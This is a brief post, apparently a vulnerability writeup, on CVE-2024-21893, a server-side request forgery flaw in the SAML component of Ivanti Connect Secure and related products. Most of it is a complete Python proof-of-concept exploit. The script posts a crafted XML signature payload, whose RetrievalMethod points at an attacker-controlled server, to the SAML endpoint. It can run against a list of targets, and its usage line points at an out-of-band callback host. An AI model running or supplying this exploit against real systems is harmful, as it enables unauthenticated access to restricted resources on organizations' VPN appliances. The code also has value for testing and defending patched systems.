Web SSRF, Ivanti - SAML, CVE-2024-21893

[blacrabbit]

CVE-2024-21893 is server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.

GitHub - h4x0r-dz/CVE-2024-21893.py: CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure

CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure - h4x0r-dz/CVE-2024-21893.py

github.com

run python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import argparse
from urllib.parse import urlparse

def ensure_http(url):
    if not url.startswith("http://") and not url.startswith("https://"):
        return f"https://{url}"
    return url

def send_poc(target_url, attacker_server):
    payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
            <ds:SignedInfo>
                <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
                <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
            </ds:SignedInfo>
            <ds:SignatureValue>qwerty</ds:SignatureValue>
            <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
                <ds:RetrievalMethod URI="{attacker_server}"/>
                <ds:X509Data/>
            </ds:KeyInfo>
            <ds:Object></ds:Object>
        </ds:Signature>
    </soap:Body>
</soap:Envelope>"""

    target_url = ensure_http(target_url)
    payload = payload_template.format(attacker_server=attacker_server)

    parsed_url = urlparse(target_url)
    full_path = parsed_url.path if parsed_url.path else "/dana-ws/saml20.ws"
    host = parsed_url.netloc

    headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        "Content-Length": str(len(payload))
    }

    response = requests.post(f"{parsed_url.scheme}://{host}{full_path}", data=payload, headers=headers, verify=False)

    print(f"Sending PoC to {target_url}...")

def main():
    parser = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    parser.add_argument('-u', '--url', type=str, help='Single target URL')
    parser.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    parser.add_argument('-a', type=str, required=True, help='Attacker server URL')
    args = parser.parse_args()

    if args.url:
        send_poc(args.url, args.a)
    elif args.list:
        with open(args.list, 'r') as file:
            for line in file:
                target = line.strip()
                if target:
                    send_poc(target, args.a)
    else:
        print("No target specified. Use -u for a single target or -l for a list of targets.")

if __name__ == "__main__":
    main()